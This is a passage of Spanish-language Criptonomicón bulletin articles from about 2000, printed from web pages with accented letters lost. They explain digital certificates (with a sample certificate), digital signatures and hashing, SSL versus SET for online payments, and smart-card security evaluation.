C=ES ST=O=OU=CN=Jaimito Email=Jaimito@jaimito serial:15
Certificate: Data: Version: 1 (0x0) Serial Number: 21 (0x15)
Signature Algorithm: md5WithRSAEncryption Issuer: C=ES
ST=L=Barcelona O=SECURITY ZUTANEZ OU=Division de certificados
CN=Fulano Menganez Email=Fulano@fulanez.es Validity Not Before:
Nov 18 15:15:31 1998 GMT Not After : Nov 13 15:15:31 1999 GMT
Subject: C=ES, ST=, O=, OU=, CN=Jaimito Email=Jaimito@jaimito
Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA
Public Key: (1024 bit) Modulus (1024 bit):
00:9e:74:de:c9:1a:6b:f4:fe:d1:04:30:58:7e:8b:
51:7a:98:23:e9:45:a9:c2:a7:7c:f8:f8:b5:9a:a2:
ea:c1:99:68:ba:f7:c3:d8:06:05:1b:6a:47:a1:44:
5c:2c:a6:e0:4b:6f:ce:02:c4:06:32:20:34:be:13:
97:39:a3:aa:6f:2f:41:a7:bc:14:c8:f3:0c:ad:9d:
09:63:8a:f5:eb:60:5b:06:a6:01:fb:1a:07:b2:c6:
39:48:bb:b7:00:56:4e:20:6d:87:3f:67:0b:2f:f4:

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos51.html (1 of 4) [25/10/2000 02:31:01 p.m.]

Qu son los certificados digitales

b0:5f:74:7f:90:6b:b4:47:6f:56:1a:b5:c5:42:54:
9b:e5:e3:00:e2:4f:e3:14:47 Exponent: 65537 (0x10001) Signature
Algorithm: md5WithRSAEncryption
3b:2b:e9:ff:48:48:35:ab:30:5c:e2:d1:88:c9:29:8b:bc:09:
b2:58:80:17:9c:e7:08:0a:7d:8a:5e:46:a8:83:3b:ee:84:de:
62:e3:ea:51:cb:92:bc:fa:db:90:bd:cd:9f:25:d4:4a:48:63:
ac:b8:93:f9:dc:9c:cf:ef:fd:45
- -----BEGIN CERTIFICATE----MIICOzCCAeUCARUwDQYJKoZIhvcNAQEEBQAwgaYxCzAJBgNVBAYTAkVTMRIwEAYD
VQQIEwlDYXRhbHVueWExDDAKBgNVBAcTA0JjbjEVMBMGA1UEChMMU0VDVVJJVFkg
QkNOMRowGAYDVQQLExFzZWNjaW8gZCdlbXByZXNlczEdMBsGA1UEAxMURGF2aWQg
R3VlcnJlcm8gVmlkYWwxIzAhBgkqhkiG9w0BCQEWFGd1ZXJyZXJvQGdyZWMudXBj
LmVzMB4XDTk4MTExODE1MTUzMVoXDTk5MTExMzE1MTUzMVowZjELMAkGA1UEBhMC
RVMxCTAHBgNVBAgTADEJMAcGA1UEChMAMQkwBwYDVQQLEwAxGDAWBgNVBAMUD0Nh
bHZpbiAmIEhvYmJlczEcMBoGCSqGSIb3DQEJARYNY2FsdmluQGhvYmJlczCBnzAN
BgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAnnTeyRpr9P7RBDBYfotRepgj6UWpwqd8
+Pi1mqLqwZlouvfD2AYFG2pHoURcLKbgS2/OAsQGMiA0vhOXOaOqby9Bp7wUyPMM
rZ0JY4r162BbBqYB+xoHssY5SLu3AFZOIG2HP2cLL/SwX3R/kGu0R29WGrXFQlSb
5eMA4k/jFEcCAwEAATANBgkqhkiG9w0BAQQFAANBADsr6f9ISDWrMFzi0YjJKYu8
CbJYgBec5wgKfYpeRqiDO+6E3mLj6lHLkrz625C9zZ8l1EpIY6y4k/ncnM/v/UU=
- -----END CERTIFICATE----Este es un certificado, vlido durante un ao, emitido por la autoridad certificadora
SECURITY ZUTANEZ para el usuario Jaimito cuya clave pblica RSA es:
exponente: 65537
modulo:
11127195552971827497702000105328725497115357432563948646524265
42649114539614030882310105443040321585401884991855044788817550
61645893205889184340440484177173313682979482908132499473623983
65177107544610936519826706567881109010715263259238888910151015
7610404623906744451048525264576885364836810773621503974118471
Todos los datos estn firmados por la AC usando la funcin hash MD5 y su clave
privada RSA.
Una firma digital es el equivalente de la firma convencional, en el sentido de que es un
aadido al final del mensaje conforme se est de acuerdo con lo que all se dice.
Formalmente, una firma digital es una transformacin de un mensaje de forma que
cualquier persona con conocimiento del mensaje y de la clave pblica del firmante
pueda comprobar que dicha transformacin ha sido realizada realmente por el
firmante.
Para verificar que el certificado es correcto deberamos hacernos con el certificado
digital emitido para dicha AC por una segunda AC. Para verificar la veracidad de este
segundo certificado deberamos obtener el certificado digital emitido para segunda AC
por una tercera AC. Como este proceso podra eternizarse, existen las llamadas
autoridades raz que firman sus propios certificados, un ejemplo de autoridad raz es
Verisign.
Aparte de los datos del emisor y del propietario del certificado ste puede contener
informacin referente a las limitaciones que se hayan establecido para su uso: e-mail,
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos51.html (2 of 4) [25/10/2000 02:31:01 p.m.]

Qu son los certificados digitales

www, etc...
Como puede observarse en el certificado del ejemplo, no existe ninguna referencia a
algoritmos de clave secreta. Cuando navegamos con Netscape y recibimos un
certificado de un servidor web 'seguro' aparece la ventana:
New Site Certificate
Here is the Certificate that is being presented:
Certificate for: UPC Signed by: UPC Encryption: Highest Grade
(RC4 with 128-bit secret key)
The signer of the Certificate promises you that the holder of
this Certificate is who they say they are. The encryption level
is an indication of how difficult it would be for someone to
eavesdrop on any information exchanged between you and this web
site.
La informacin ''Encryption: Highest Grade (RC4 with 128-bit secret key)'' no tiene
nada que ver con el certificado presentado por el servidor, slo depende del
navegador utilizado y del servidor, a distinto navegador distinto grado de cifrado.
Aunque desde un punto de vista tcnico cualquiera puede erigirse en AC (slo es
necesario disponer de un par de claves pblica-privada para firmar y verificar la firma,
y todo aquel que desee obtener un certificado las tiene), una AC, adems de emitir
certificados, debera ofrecer los servicios siguientes:
Bsqueda de certificados: Una persona puede querer buscar el certificado
referente a otra persona o entidad.
Revocacin: Si un certificado se pierde, el titular debe poder informar a la AC
para que lo anule y emita otro. Tambin si la clave privada ha quedado
comprometida debe ser posible su revocacin.
Suspensin: La AC debe suspender la validez de un certificado si se hace un
uso anormal de l.
Estado del certificado: Las personas a las que se les presenta un certificado
deben de poder comprobar que no ha sido revocado o suspendido.
Actualmente an se est desarrollando el marco legal que regule el reconocimiento de
la validez legal de las firmas digitales y cules han de ser los requerimientos mnimos
que han de reunir las autoridades certificadoras para ser reconocidas como tales.
Publicado en el Boletn del Criptonomicn #51.
Fernando Martnez es profesor de la asignatura de criptografa del departamento de Matemtica
Aplicada II de la UPC.

Informacin adicional

Los secretos de la firma electrnica

PKI o los cimientos de una criptografa de clave pblica

Firma digital

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos51.html (3 of 4) [25/10/2000 02:31:01 p.m.]

Qu son los certificados digitales

Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes envirselo por
correo electrnico. No tienes ms que indicar la direccin del destinatario, el asunto y tu
nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre privacidad, por favor
consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de visitas. Para contribuir al
Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos51.html (4 of 4) [25/10/2000 02:31:01 p.m.]

Cmo funcionan las firmas digitales

Comercio electrnico

Criptologa y seguridad

Cmo funcionan las firmas digitales

Cuestiones legales

Por Pino Caballero Gil

Intimidad y privacidad

Aunque el problema criptogrfico ms conocido es el de la confidencialidad


de los mensajes, con el auge de las comunicaciones electrnicas ha cobrado
especial importancia el tema de la autenticidad, que tambin requiere
solucin criptogrfica.

Virus

Los esquemas de autenticacin sirven para confirmar tanto la validez del


mensaje emitido como la legitimidad del emisor. Intimamente relacionado
con este concepto nos encontramos con la idea de firma digital, que,
adems de lo anterior, asegura que el firmante de un mensaje no puede
posteriormente negar haberlo firmado.
Supongamos que Baltasar (B) y Alicia (A) comparten una clave secreta, y
que A recibe un mensaje cifrado supuestamente de B. En principio, tras la
recuperacin exitosa del mensaje, A no tiene ninguna duda de que dicho
mensaje proviene de B (autenticacin), pero este esquema no es de firma
digital porque B siempre puede repudiar el mensaje alegando que realmente
lo produjo A.
Sin embargo, este problema se puede resolver fcilmente usando un cifrado
de clave pblica de la siguiente forma. B enva a A un mensaje cifrado con
su clave secreta, A lo descifra con la clave pblica de B, y guarda la versin
cifrada. As, si B pretende repudiar su firma, A tiene una prueba definitiva:
nadie, salvo B, podra haber generado el mensaje cifrado.
Aunque la firma digital descrita es totalmente vlida, no resulta muy prctica
dadas las dimensiones de los datos manejados. Es ah donde entra a jugar
parte la funcin hash criptogrfica, que reduce el mensaje de partida a un
valor resumen de menor longitud, de forma que ste sirve como
representacin compacta del anterior pudiendo aplicrsele el
correspondiente cifrado sin problemas graves de eficiencia en las
comunicaciones.
Ahora bien, para que una funcin hash sea criptogrficamente til es
necesario que verifique las propiedades de "resistencia a las colisiones", que
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos32.html (1 of 3) [25/10/2000 02:31:02 p.m.]

Cmo funcionan las firmas digitales

garantizan cierto grado de dificultad para encontrar mensajes distintos con


idnticos resmenes, ya que, en caso contrario, las firmas digitales podran
ser objeto de los conocidos como "ataques del cumpleaos", basados en la
construccin de mensajes falsos con resmenes (y consecuentes firmas)
conocidos.
Una de las conclusiones que se extraen del estudio de este tipo de ataques
es la importancia del parmetro longitud de resumen, ya que la factibilidad
de dichos ataques depende directamente de l: "a mayor longitud, mayor
seguridad". Obviamente en ese caso el esquema tambin resulta menos
prctico por lo que hay que encontrar un punto de equilibrio entre ambas
caractersticas, que hoy en da se cifra en aproximadamente 160 bits.
Una vez se tiene la funcin hash (basada en claves secretas: MAC, o no:
MDC) productora de resmenes de una longitud adecuada, se puede
combinar con cifrados de clave secreta o/y pblica, aplicndose stos sobre
mensaje o/y resumen, logrando con ello un esquema de firma digital a la vez
prctico y seguro.
Publicado en el Boletn del Criptonomicn #32.
Pino Caballero Gil es Doctora en Ciencias Matemticas y Profesora Titular de la
Universidad de La Laguna, Premio Da de Canarias para Jvenes Investigadores 1998 y
autora del libro "Introduccin a la Criptografa".

Informacin adicional

Los secretos de la firma electrnica

Firma digital

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos32.html (2 of 3) [25/10/2000 02:31:02 p.m.]

Cmo funcionan las firmas digitales


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos32.html (3 of 3) [25/10/2000 02:31:02 p.m.]

Falsas expectativas del comercio electrnico

Comercio electrnico

Criptologa y seguridad

Falsas expectativas del comercio electrnico

Cuestiones legales

Por Javier Carb Rubiera

Intimidad y privacidad

El 1 de Abril de 1999 apareci publicada una noticia en el Ciberp@s sobre

Virus

una querella de una tienda madrilea contra Banesto por fallos en el pago
electrnico. La noticia deca:
"Los fallos en el pago electrnico a travs del protocolo SSL son
responsabilidad de los medios de pago que, como los que ofrece Banesto,
se ponen a disposicin de las tiendas virtuales". As interpreta Santiago
Ureta, portavoz de Weblisten, que el Juzgado de Instruccin nmero 42 de
Madrid admita la denuncia de esta empresa contra Banesto por estafa y
falsedad documental.
No ser sta la ltima disputa en el terreno del comercio electrnico,
mientras se implanta el nuevo protocolo SET, ms seguro que SSL porque
garantiza mediante certificado que el cliente es quien dice ser."
Hay cuatro requisitos de seguridad en un protocolo de pago: la
confidencialidad (el secreto de las identidades y del pago ante terceros), la
autenticacin (identificacin de los participantes en la transaccin), la
integridad (no modificacin en el trnsito) y el no repudio (ni el emisor ni el
receptor pueden negar haber solicitado un pago o una autorizacin de pago).
La periodista da a entender que SSL y SET sirven para lo mismo. SSL es un
canal que permite la confidencialidad, autenticacin e integridad de las
comunicaciones, pero no asegura el no-repudio. La autenticacin y el no
repudio no son la misma cosa. Autenticar significa identificar el origen de un
mensaje (el que est al otro lado del canal de comunicacin es quin dice
ser). El no-repudio consiste en que ni el emisor ni el receptor puedan negar
su participacin en una transaccin. Para conseguir esto ltimo es preciso
utilizar firmas digitales con claves pblicas certificadas por entidades dignas
de confianza (como hace SET).
Por lo que SSL (por s mismo) no es adecuado utilizarlo en los pagos ya que
ninguna de las partes adquiere compromiso alguno que les obligue a aceptar

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos50.html (1 of 3) [25/10/2000 02:31:02 p.m.]

Falsas expectativas del comercio electrnico

la responsabilidad del pago. Es decir, que, por lo que se entiende del artculo
del peridico (no es muy explcito respecto al mecanismo o configuracin
concretos que se han seguido), la irresponsabilidad aparentemente es mutua
porque el banco y la tienda han aceptado un pago no firmado.
SET es un sistema de pago en lnea (on-line): necesita de la autorizacin
expresa del banco realizada mediante una comunicacin con ste a travs
de una entidad intermedia conocida como pasarela (aunque por razones de
eficiencia SET permite al comercio aceptar el pago sin la autorizacin del
banco adems de aceptar varios pagos con una autorizacin previa).
Pero no vayamos a creer que SET es un protocolo genrico de pago, SET
solo puede usarse para pagos con tarjetas de crdito. Por ejemplo no se
pueden intercambiar dinero dos usuarios, firmar contratos entre particulares,
negociacin de precios, etc.
Por lo que dice el artculo, la tienda se dedica a vender canciones en formato
digital (MP3) y ha pasado a utilizar SET para vender las canciones. Pero
SET no es adecuado para pagos de poco valor (micropagos) puesto que no
es lo suficientemente econmico. Un sistema de micropagos eficiente a gran
escala ha de ser autnomo (off-line), es decir que la verificacin de la validez
del dinero venga de la informacin digital que constituye el propio dinero.
Una alternativa a esto (para evitar que se copie y reutilice fcilmente este
dinero virtual) consiste en que la confianza en la existencia de dinero real
que respalde al dinero electrnico resida en la proteccin de un dispositivo
fsico a prueba manipulaciones (como puede ser una tarjeta inteligente).
Es indudable que an se tardar mucho tiempo en que las fabulosas cifras
que se manejan en los estudios de prospectiva financiera se hagan realidad.
Segn mi criterio, se combinan tres tendencias: la picaresca caracterstica
del potencial usuario (sensacin de impunidad de internet), la incapacidad de
manejar adecuadamente todas las posibilidades tcnicas que, ya hoy, la
criptografa pone en nuestras manos y por ltimo, el culto a la imagen
(vendiendo como seguras cosas que no lo son con la nica intencin de
aparentar ser ms modernos que la competencia). Adems est el problema
econmico que representa la inversin en equipos y personal que, hoy por
hoy, es tmida (tarjetas inteligentes, lectores, equipos que accedan a
Internet, contratacin de personal dedicado a seguridad informtica, etc.).
A modo de conclusin opino que se debera dar ms importancia a los
aspectos relacionados con la seguridad, la criptografa y la legislacin
informtica en los planes de estudio de facultades y escuelas de informtica.
La mejor forma de anticipar la generalizacin del comercio electrnico en sus
diversas formas est en minimizar los fraudes que puedan producirse
inicialmente. Por eso los pasos hay que darlos uno a uno. Y lo primero es
formar en serio y en profundidad.
En su momento cost mucho tiempo y esfuerzo que se aceptaran sin
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos50.html (2 of 3) [25/10/2000 02:31:02 p.m.]

Falsas expectativas del comercio electrnico

problemas el papel moneda y los cheques y que se confiara en los cajeros


automticos. Si queremos que las expectativas puestas en el comercio
electrnico no se vean defraudadas, hay que poner mucho cuidado en que
todo funcione bien desde el principio.
Publicado en el Boletn del Criptonomicn #50.
Javier Carb Rubiera es colaborador del Grupo de Investigacin en Criptologa (Criptolab)
de la Facultad de Informtica de la Universidad Politcnica de Madrid y Profesor de la
Facultad de Informtica de la Universidad Pontificia de Salamanca.

Informacin adicional

Seguridad en el comercio electrnico: SSL o SET?

Seguridad en SSL, artculo publicado en iWorld.

SET a fondo, artculo publicado en iWorld.

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos50.html (3 of 3) [25/10/2000 02:31:02 p.m.]

Seguridad en Tarjetas con Microprocesador

Comercio electrnico

Criptologa y seguridad

Cuestiones legales

Seguridad en Tarjetas con Microprocesador:


Procedimientos de Evaluacin y Consecucin de
Estndares

Intimidad y privacidad

Por Francisco Ginel


Virus

La naturaleza cambiante de los Medios de Pago se est viendo acelerada en


estos ltimos aos por la introduccin de nuevas tecnologas que van a
cambiar drsticamente el modo en que nos relacionamos, operamos e
interactuamos en general con nuestro entorno. Estas nuevas tecnologas y,
concretamente, las tarjetas inteligentes e Internet, estn abriendo nuevos
entornos de productos pero, al mismo tiempo, introducen nuevos riesgos (o
niveles de riesgos) en el sistema.
En el caso de las tarjetas inteligentes nos encontramos ante una tecnologa
que, con productos diseados e implantados de la manera apropiada, nos
puede proporcionar una oportunidad incomparable para mitigar y,
potencialmente, eliminar algunos de los problemas de fraude con los que
actualmente nos enfrentamos.
Hay dos puntos de vista diametralmente opuestos acerca de la seguridad de
las tarjetas con microprocesador: que son inherentemente seguras y que se
"rompen" fcilmente. Ninguno de los dos es correcto. Hay algunos casos,
que han sido objeto de gran atencin por parte de la prensa, en los que se
habla de tarjetas inteligentes que han sido "rotas", pero si la tarjeta ha sido
diseada con el objetivo de mantener la seguridad puede ser muy difcil de
atacar. Todos podemos asegurarnos de que nuestra tarjeta est al nivel
adecuado si comprendemos cuales son las amenazas y tomamos las
medidas necesarias para contrarrestarlas.
Susceptibilidades de la Tarjeta Inteligente
No hay nada seguro al 100%, si se dispone de los recursos necesarios para
el ataque. Incluso microprocesadores extremadamente sofisticados son
objeto de ingeniera inversa de manera rutinaria, sta es la razn por la que
existen clones y por lo que los diseadores de estos "chips" trabajan
continuamente para mejorarlos en la siguiente generacin. Nos encontramos

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (1 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

con la carrera permanente entre el lder del mercado y los competidores que
tratan de alcanzarle - y lo consiguen despus de algn tiempo. Desde el
punto de vista de seguridad, la manera de asegurarte que alguien te atacar
con xito es estar convencido de que nadie puede hacerlo.
Algunas tarjetas son ms susceptibles a los ataques que otras. Hay una
serie de medidas de seguridad perfectamente conocidas que pueden
aadirse a los microprocesadores de las tarjetas "chip" o a las aplicaciones,
pero no siempre son utilizadas o activadas. Los "chips" que han sido
utilizados tradicionalmente en las tarjetas inteligentes fueron diseados en
su origen como microcontroladores incrustados y adems son utilizados in
una amplia variedad de aplicaciones donde la seguridad no es un problema.
De hecho, la seguridad puede ser innecesaria en estas otras aplicaciones,
porque fueron diseadas para entornos de alta fiabilidad. Esto quiere decir
que si algo va mal, el "chip" tratar de solventar el problema y continuar
"haciendo lo que ha sido diseado para hacer". Pero en una tarjeta
inteligente, ese problema puede ser un signo de que un "hacker" est
intentando obtener informacin confidencial de la tarjeta. Lo que
necesitamos de ese "chip" es que "falle" limpiamente con un "reset" o un
bloqueo total, dependiendo del tipo y la gravedad del ataque.
No hay manera de garantizar la seguridad, pero la mejor manera de
asegurarse un nivel alto de seguridad es tener el diseo evaluado y el
producto final probado. Dado que las capacidades de anlisis y prueba
mejoran constantemente, es imposible prever todos los ataques que alguien
pueda imaginar.
Disear con la seguridad en mente agrega complejidad y costo a los "chips".
En algunas aplicaciones de alta seguridad, el riesgo de que alguien pueda
obtener una informacin puede ser lo suficientemente alto como para
necesitar asegurarse de que todas las medidas de seguridad posibles han
sido implantadas. En un mundo ideal las tarjetas de servicios financieros
seran una de estas aplicaciones. Pero la industria financiera es muy
sensible a los costes. Las tarjetas de banda magntica funcionan bastante
bien para su uso actual y, si las tarjetas inteligentes van a sustituirlas en
algn momento, el precio debe ser tan bajo como sea posible. La pregunta
no tiene que ser "Cmo puede ser de segura una tarjeta inteligente?" sino
"Cul es el nivel de seguridad ms rentable para el uso del que van a ser
objeto estas tarjetas?".
En Visa creemos que la seguridad no debera ser un arma competitiva en la
industria de las tarjetas financieras. Todos perderamos si se hiciera pblico
un problema de seguridad importante, independientemente de quin fuera el
emisor o la institucin financiera involucrada. Es una cuestin de credibilidad
y de confianza general, y nuestro objetivo es que todo el mundo sea
consciente de los problemas potenciales de seguridad. Esta es la razn por
la que nos encontramos hoy en esta conferencia.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (2 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

Objetivos de Seguridad
Hay unas cuantas cosas que todos podemos hacer para asegurar un nivel
adecuado de seguridad. Lo primero es establecer un objetivo de seguridad
apropiado. La seguridad es un problema de ms o menos, no de presente o
ausente. Tenemos que pensar en varios niveles de objetivos o modelos de
seguridad - analizar qu estamos tratando de proteger y cules son las
amenazas potenciales.
La meta debera ser siempre llegar a una situacin en la que el coste o el
esfuerzo del ataque fuera significativamente mayor al beneficio que
comportara si tuviese xito.Si alguien quiere gastar 1.000.000 de Ptas. para
romper una tarjeta desechable de $2.000 Ptas., y esto slo le da acceso a
esa nica tarjeta, la amenaza no es muy grande. Cuanto mayor es el valor
del bien a proteger y ms sencillo el ataque, ms crece la amenaza del
mismo.
Una vez se ha definido el nivel de seguridad requerido, tiene que haber un
proceso de verificacin del mismo. Un principio bsico debera ser que quin
disea un sistema no est capacitado para evaluarlo. Cuando este principio
no se cumple, normalmente nos encontramos con que el "evaluador" se ha
ocupado ms de resaltar las brillantes ideas que tuvo que de encontrar
puntos dbiles.
Validaciones
Hay una variedad de estndares internacionales que algunos pueden pensar
que garantizan la seguridad de las tarjetas inteligentes financieras. Sin
embargo, muchos de ellos, como ISO 7816, se refieren a la funcionalidad de
las tarjetas ms que a su seguridad. No se puede depender nicamente de
estos estndares para garantizar ningn nivel de seguridad en particular.
ITSEC (Information Technology Security Evaluation Criteria) es un sistema
europeo desarrollado para validar aspectos de seguridad en las tecnologas
de la informacin. ITSEC se ocupa de verificar aquello que ha sido declarado
por el fabricante del producto, a travs de laboratorios independientes y
licenciados. Sin embargo, las declaraciones no estn estandarizadas. As, si
un producto tiene una calificacin ITSEC, esto no nos indica por s mismo
que ha sido declarado y validado en su totalidad. La validacin puede
haberse realizado nicamente en una parte del sistema, por ejemplo el
generador de nmeros aleatorios. Aunque tener un buen generador de
nmeros aleatorios es una caracterstica de seguridad importante en un
"chip", esto no nos dice nada acerca de otras caractersticas que pueden
conllevar vulnerabilidades significativas. ITSEC es un paso en la direccin
correcta, pero no es suficiente en s mismo.
Existe asimismo una variedad de estndares de seguridad gubernamentales
en diversos pases, pero no son consistentes entre s. Algunos gobiernos

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (3 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

requieren que todos los sistemas de monedero electrnico sean auditables,


otros no. Algunos requieren cifrado DES en determinados puntos, otros
3-DES, tecnologas de clave pblica o cualquier otra forma de cifrado
especfica. Cualquier certificacin de que una tarjeta inteligente en particular
cumple los estndares de seguridad de un gobierno, no significa
necesariamente que sea aceptable en cualquier otro lugar.
El esfuerzo que se est llevando a cabo bajo el nombre "Common Criteria"
(Common Criteria for Information Security Technology) tiene un enorme
inters. A pesar de ello, no incluye a todos los pases con cierta significacin
en la industria (entre ellos Espaa), y precisa de algunos ajustes operativos
para satisfacer no slo las necesidades de los fabricantes sino tambin las
de los usuarios. De nuevo, es un paso en la direccin correcta, pero an
queda trabajo por hacer.
Los requerimientos de la industria financiera son algo diferentes de los del
resto. Las tarjetas telefnicas, por ejemplo, GSM o prepagadas, estn
diseadas para ser usadas siempre en conexin, mientras que las tarjetas
financieras necesitan en determinadas circunstancias operan fuera de lnea.
Estas diferencias se traducen en diferentes requerimientos de seguridad y
diferentes mecanismos de proteccin.
Los requerimientos de la televisin de pago son tambin diferentes. La
industria del cable estima que una parte significativa de su beneficio
potencial se pierde a causa de los "piratas" que roban la seal sin pagar por
ella. Pero siempre se trata de una prdida de beneficio potencial, no real. Un
sistema de tarjeta inteligente que capture incluso una pequea proporcin de
este beneficio potencial es una ganancia neta para su sistema, con un
pequeo coste adicional. En cambio, cada vez que una tarjeta bancaria es
utilizada, hay una transferencia de fondos. Alguien tiene que responder por
cada transaccin fraudulenta; conlleva una perdida de ganancia real, no
potencial. Las amenazas, requerimientos de seguridad y mecanismos de
auditora del sistema son, por consiguiente, diferentes.
En el otro extremo, las tarjetas utilizadas para proteger bienes
extremadamente valiosos, como redes de seguridad nacionales, pueden
disearse para autoborrarse al detectar el menor signo que indique un
potencial ataque exterior. Eso tampoco funcionara con una tarjeta
financiera, con la que no se puede dejar a un viajero tirado lejos de casa sin
medios para pagar comida, alojamiento y otras necesidades. En ambos
casos hay procedimientos de respaldo para proteger el acceso del usuario a
sus fondos, pero las situaciones son muy diferentes.
En un sistema financiero la tarjeta es parte de un sistema ms grande que
incluye simultneamente debilidades y medidas de proteccin adicionales.
En transacciones de crdito y dbito existe un extracto mensual que el titular
puede revisar para detectar errores. Los establecimientos comerciales que
cometen "errores" con excesiva frecuencia pueden ser incluidos en una lista
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (4 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

de alertas y educados o corregidos de diversas maneras. El sistema puede


tolerar errores aislados porque an pueden manejarse de manera razonable
y rentable. Ciertas aplicaciones de seguridad nacional, en cambio, no
pueden tolerar ni un solo error. La mayora de los sistemas de
telecomunicaciones, por otro lado, no pueden depender de un extracto
mensual para detectar y corregir errores.
Cada industria y cada aplicacin tiene sus propios requerimientos de
seguridad, as que es difcil que exista un estndar de seguridad nico. Lo
que es importante es comprender el rol que juega la tarjeta en la globalidad
del sistema al que pertenece, y disear la seguridad que es adecuada y
apropiada para ese rol.
El sistema de validacin de Visa
Visa realiza revisiones de seguridad en 4 niveles: especificaciones,
plataforma, sistema operativo y diseo de aplicaciones, e implantacin final.
Cada especificacin de Visa est diseada por nuestros expertos y
posteriormente enviada a expertos externos para que revisen su seguridad.
Estamos convencidos de que nuestros diseadores se encuentran entre los
mejores del mundo, pero nadie puede revisar adecuadamente su propio
trabajo. "Especificaciones" quiere decir aqu cualquiera de las relativas a
productos de tarjeta inteligente que han sido publicadas por nuestra
compaa. Son habitualmente especificaciones funcionales que indican
cmo debera trabajar una aplicacin.
La plataforma "chip" en la cual la especificacin va a ser desarrollada es
objeto asimismo de una revisin de seguridad independiente. Las tarjetas
"chip" de Visa utilizan componentes de las mejores compaas de
semiconductores. Aunque tenemos absoluta confianza en la calidad de su
trabajo, ninguno puede revisar de manera adecuada su propio trabajo. No
hay sustituto posible para una revisin independiente.
Cada "chip" puede tener uno o ms sistemas operativos. La documentacin
del sistema operativo se revisa con el objetivo de conocer cuales son sus
fortalezas y sus debilidades. Cada sistema operativo est diseado para
diferentes tipos de aplicaciones, as uno pensado para una aplicacin de
telefona GSM puede tener caractersticas diferentes de otro especialmente
diseado para la industria financiera.
Cada "chip" y cada sistema operativo pueden tener mltiples aplicaciones,
sea en forma de distintas tarjetas monoaplicacin o combinadas en tarjetas
multiaplicacin. Las especificaciones funcionales que Visa provee son
convertidas en especificaciones de diseo detalladas por los suministradores
de tarjetas. Estas especificaciones de diseo detalladas estn hechas a la
medida del "chip" y del sistema operativo en los que van a ser utilizadas,
mientras que las especificaciones funcionales de Visa no lo estn. Nosotros
llevamos a cabo una revisin de seguridad del sistema operativo y de las
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (5 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

especificaciones de diseo detalladas, as como de las especificaciones


funcionales del "chip".
Pero la pregunta clave no es si estos elementos son adecuadamente
seguros en s mismos, sino si son capaces de trabajar juntos
adecuadamente para producir una tarjeta final que sea tan segura como se
necesita. Por eso el paso final es llevar la implantacin final en la tarjeta y
hacer una revisin de seguridad con ella. Entonces la sometemos a una
serie de ataques del modo en que lo hara un "hacker" experimentado para
asegurarnos de que no es susceptible a ninguno de los mtodos de ataque
conocidos.
No creemos que exista ninguna tarjeta absolutamente segura. Por eso no
pedimos a los laboratorios que nos digan si la tarjeta es segura o no. Lo que
les pedimos es que nos digan cunto esfuerzo y qu recursos se necesitan
para comprometerla. Asumimos que todas las tarjetas pueden romperse.
Metodologa de valoracin
Categorizamos los recursos que se necesitan para comprometer una tarjeta
de diversas formas. Los recursos primarios son conocimientos, capacidad e
inversin. Distintos tipos de ataques requieren distintas capacidades por
parte del atacante. Los ataques al "hardware" requieren un cierto grado de
ingeniera inversa del "chip". Todo lo que ha sido diseado en ingeniera
puede ser objeto de ingeniera inversa y existen herramientas y tcnicas
especficas para hacerlo. Estas herramientas son equipo estndar en los
laboratorios de desarrollo de semiconductores, donde las utilizan
generalmente para probar y eliminar errores en nuevos "chips". Por
